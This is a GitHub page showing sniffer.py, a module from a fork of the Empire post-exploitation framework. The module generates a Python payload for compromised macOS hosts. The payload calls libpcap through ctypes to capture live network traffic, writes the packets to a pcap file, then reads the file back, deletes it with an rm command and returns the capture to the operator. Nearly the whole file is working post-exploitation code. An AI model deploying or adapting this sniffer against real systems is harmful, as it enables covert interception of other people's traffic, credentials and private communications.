forked from EmpireProject/Empire
-
-
Notifications
You must be signed in to change notification settings - Fork 584
/
Copy pathsniffer.py
151 lines (135 loc) · 5.44 KB
/
sniffer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
from empire.server.common.empire import MainMenu
from empire.server.core.module_models import EmpireModule
class Module:
@staticmethod
def generate(
main_menu: MainMenu,
module: EmpireModule,
params: dict,
obfuscate: bool = False,
obfuscation_command: str = "",
) -> str:
script = "\n"
for item in ["ctypes", "threading", "sys", "os", "errno", "base64"]:
script += "import %s \n" % item
savePath = params["SavePath"]
Debug = params["Debug"]
maxPackets = params["MaxPackets"]
libcPath = params["LibcDylib"]
pcapPath = params["PcapDylib"]
if params["CaptureInterface"]:
script += "INTERFACE = '%s' \n" % params["CaptureInterface"]
else:
script += "INTERFACE = '' \n"
script += "DEBUG = %s \n" % Debug
script += "PCAP_FILENAME = '%s' \n" % savePath
script += "PCAP_CAPTURE_COUNT = %s \n" % maxPackets
script += "OSX_PCAP_DYLIB = '%s' \n" % pcapPath
script += "OSX_LIBC_DYLIB = '%s' \n" % libcPath
script += R"""
IN_MEMORY = False
PCAP_ERRBUF_SIZE = 256
packet_count_limit = ctypes.c_int(1)
timeout_limit = ctypes.c_int(1000) # In milliseconds
err_buf = ctypes.create_string_buffer(PCAP_ERRBUF_SIZE)
class bpf_program(ctypes.Structure):
_fields_ = [("bf_len", ctypes.c_int),("bf_insns", ctypes.c_void_p)]
class pcap_pkthdr(ctypes.Structure):
_fields_ = [("tv_sec", ctypes.c_long), ("tv_usec", ctypes.c_long), ("caplen", ctypes.c_uint), ("len", ctypes.c_uint)]
class pcap_stat(ctypes.Structure):
_fields_ = [("ps_recv",ctypes.c_uint), ("ps_drop",ctypes.c_uint), ("ps_ifdrop", ctypes.c_int)]
def pkthandler(pkthdr,packet):
cp = pkthdr.contents.caplen
if DEBUG:
print("packet capture length: " + str(pkthdr.contents.caplen))
print("packet tottal length: " + str(pkthdr.contents.len))
print((pkthdr.contents.tv_sec,pkthdr.contents.caplen,pkthdr.contents.len))
print(packet.contents[:cp])
if DEBUG:
print("-------------------------------------------")
libc = ctypes.CDLL(OSX_LIBC_DYLIB, use_errno=True)
if not libc:
if DEBUG:
print("Error loading C libary: %s" % errno.errorcode[ctypes.get_errno()])
if DEBUG:
print("* C runtime libary loaded: %s" % OSX_LIBC_DYLIB)
pcap = ctypes.CDLL(OSX_PCAP_DYLIB, use_errno=True)
if not pcap:
if DEBUG:
print("Error loading C libary: %s" % errno.errorcode[ctypes.get_errno()])
if DEBUG:
print("* C runtime libary loaded: %s" % OSX_PCAP_DYLIB)
print("* C runtime handle at: %s" % pcap)
print("-------------------------------------------")
if not INTERFACE:
pcap_lookupdev = pcap.pcap_lookupdev
pcap_lookupdev.restype = ctypes.c_char_p
INTERFACE = pcap.pcap_lookupdev()
if DEBUG:
print("* Device handle at: %s" % INTERFACE)
net = ctypes.c_uint()
mask = ctypes.c_uint()
pcap.pcap_lookupnet(INTERFACE,ctypes.byref(net),ctypes.byref(mask),err_buf)
if DEBUG:
print("* Device IP to bind: %s" % net)
print("* Device net mask: %s" % mask)
#pcap_t *pcap_open_live(const char *device, int snaplen,int promisc, int to_ms, char *errbuf)
pcap_open_live = pcap.pcap_open_live
pcap_open_live.restype = ctypes.POINTER(ctypes.c_void_p)
pcap_create = pcap.pcap_create
pcap_create.restype = ctypes.c_void_p
#pcap_handle = pcap.pcap_create(INTERFACE, err_buf)
pcap_handle = pcap.pcap_open_live(INTERFACE, 1024, packet_count_limit, timeout_limit, err_buf)
if DEBUG:
print("* Live capture device handle at: %s" % pcap_handle)
pcap_can_set_rfmon = pcap.pcap_can_set_rfmon
pcap_can_set_rfmon.argtypes = [ctypes.c_void_p]
if (pcap_can_set_rfmon(pcap_handle) == 1):
if DEBUG:
print("* Can set interface in monitor mode")
pcap_pkthdr_p = ctypes.POINTER(pcap_pkthdr)()
packetdata = ctypes.POINTER(ctypes.c_ubyte*65536)()
#print pcap.pcap_next(pcap_handle,ctypes.byref(pcap_pkthdr_p))
if DEBUG:
print("-------------------------------------------")
pcap_dump_open = pcap.pcap_dump_open
pcap_dump_open.restype = ctypes.POINTER(ctypes.c_void_p)
pcap_dumper_t = pcap.pcap_dump_open(pcap_handle,PCAP_FILENAME)
if DEBUG:
print("* Pcap dump handle created: %s" % pcap_dumper_t)
print("* Pcap data dump to file: %s" % (PCAP_FILENAME))
print("* Max Packets to capture: %s" % (PCAP_CAPTURE_COUNT))
print("-------------------------------------------")
# CMPFUNC = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p)
# def pkthandler_callback(pcap_pkthdr,pdata):
# pcap.pcap_dump(pcap_dumper_t,pcap_pkthdr,pdata)
# cmp_func = CMPFUNC(pkthandler_callback)
# pcap.pcap_loop(pcap_handle, PCAP_CAPTURE_COUNT, cmp_func, 0)
c = 0
while True:
if (pcap.pcap_next_ex(pcap_handle, ctypes.byref(pcap_pkthdr_p), ctypes.byref(packetdata)) == 1):
pcap.pcap_dump(pcap_dumper_t,pcap_pkthdr_p,packetdata)
#pkthandler(pcap_pkthdr_p,packetdata)
c += 1
if c > PCAP_CAPTURE_COUNT:
if DEBUG:
print("* Max packet count reached!")
break
if DEBUG:
print("-------------------------------------------")
print("* Pcap dump handle now freeing")
pcap.pcap_dump_close(pcap_dumper_t)
if DEBUG:
print("* Device handle now closing")
if not (pcap.pcap_close(pcap_handle)):
if DEBUG:
print("* Device handle failed to close!")
if not IN_MEMORY:
f = open(PCAP_FILENAME, 'rb')
data = f.read()
f.close()
os.system('rm -f %s' % PCAP_FILENAME)
sys.stdout.write(data)
"""
# add any arguments to the end exec
return script